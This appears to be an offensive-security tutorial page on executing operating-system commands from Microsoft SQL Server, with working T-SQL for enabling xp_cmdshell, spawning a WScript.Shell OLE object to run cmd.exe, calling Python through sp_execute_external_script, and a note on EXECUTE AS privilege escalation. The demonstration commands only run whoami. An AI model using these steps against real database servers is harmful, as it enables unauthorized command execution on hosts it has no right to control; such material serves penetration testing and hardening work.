MSSQL Command Execution

Context

This article teaches how to execute system commands through SQL injection on Microsoft SQL Server. It assumes knowledge of SQL Server architecture, SQL query execution, and command execution context. This offensive technique leverages misconfigurations or vulnerabilities within SQL Server to execute commands on the underlying operating system.

Theory

Command Execution via xp_cmdshell

Definition: The xp_cmdshell extended stored procedure allows users to execute arbitrary shell commands directly from SQL Server.

Vulnerability Model: When xp_cmdshell is enabled, it opens a potential security hole by allowing execution of OS-level commands. Attackers can exploit this to perform various actions on the system hosting the SQL Server.

Precondition: The xp_cmdshell feature must be enabled on the SQL Server for this technique to be exploited.

Using sp_OACreate for Command Execution

Definition: The sp_OACreate is a stored procedure that enables the creation of OLE Automation objects within SQL Server, which can, in turn, execute system commands.

Vulnerability Model: If permissions allow, sp_OACreate can be abused to execute commands remotely. It's typically targeted when xp_cmdshell is disabled.

Precondition: Sysadmin privileges or equivalent permissions are required to create OLE Automation objects.

Executing Commands with sp_execute_external_script

Definition: This procedure allows for running scripts in external languages, such as Python, within SQL Server.

Vulnerability Model: If not properly secured, it can allow attackers to execute arbitrary code on the server.

Precondition: External scripting must be enabled and correctly configured for this method to work.

Leveraging EXECUTE AS for Privilege Escalation

Definition: The EXECUTE AS statement allows a user to change the execution context to another user, potentially with higher privileges.

Vulnerability Model: It can be used for privilege escalation if permissions are not properly configured, giving attackers access to restricted functionalities.

Precondition: Impersonation permissions are necessary to switch execution contexts.

Practice

Command Execution via xp_cmdshell

  • Enable Advanced Options:

    EXEC sp_configure 'show advanced options', 1; 
RECONFIGURE;

    This command ensures that advanced configuration options can be updated on the SQL Server.

  • Enable xp_cmdshell:

    EXEC sp_configure 'xp_cmdshell', 1; 
RECONFIGURE;

    By enabling xp_cmdshell, commands can now be sent to the operating system.

  • Execute Verification Command:

    EXEC xp_cmdshell 'whoami';

    This command checks the user context in which the SQL Server runs commands, verifying the effectiveness of xp_cmdshell.

Command Execution using sp_OACreate

  • Create OLE Object:

    DECLARE @Object INT; 
EXEC sp_OACreate 'WScript.Shell', @Object OUTPUT;

    Initiate an OLE Automation object to enable command execution.

  • Execute Command via OLE Object:

    EXEC sp_OAMethod @Object, 'Run', NULL, 'cmd.exe /c whoami';

    Using the created object, execute a command to demonstrate capability.

Executing Commands with sp_execute_external_script

  • Run External Script:

    EXEC sp_execute_external_script 
    @language = N'Python', 
    @script = N'import os; os.system("whoami")';

    This script uses Python to execute a command on the operating system, demonstrating sp_execute_external_script capabilities.

Tools

  • sqlcmd
  • PowerShell

These tools are essential for interacting with SQL Server and executing commands via the described methods.

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.